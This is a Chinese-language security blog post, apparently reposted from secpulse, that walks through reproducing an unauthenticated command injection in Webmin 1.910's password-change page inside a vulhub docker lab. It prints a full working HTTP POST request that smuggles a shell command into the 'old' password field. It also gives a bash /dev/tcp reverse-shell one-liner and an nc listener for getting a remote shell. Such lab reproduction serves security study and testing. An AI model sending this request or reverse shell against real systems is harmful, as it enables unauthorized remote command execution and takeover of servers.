漏洞介绍:
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
漏洞环境:
在vulhub执行如下命令,启动webmin 1.910: docker-compose up -d 执行完成后,访问https://your-ip:10000,忽略证书后即可看到webmin的登录页面。
漏洞复现:
参考链接中的数据包是不对的,经过阅读代码可知,只有在发送的user参数的值不是已知Linux用户的情况下(而参考链接中是user=root),才会进入到修改/etc/shadow的地方,触发命令注入漏洞。
发送如下数据包,即可执行命令ls:
POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60 user=rootxx&pam=&expired=2&old=test|ls&new1=test2&new2=test2
命令成功执行:
简单利用getshell:
将命令 bash -c "bash -i >& /dev/tcp/192.168.220.128/9999 0>&1" 进行url编码 用nc -vvlp 9999 监听任意端口等待返回shell
成功返回shell
本文作者:hatjwe
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/138913.html
必填 您当前尚未登录。 登录? 注册
必填(保密)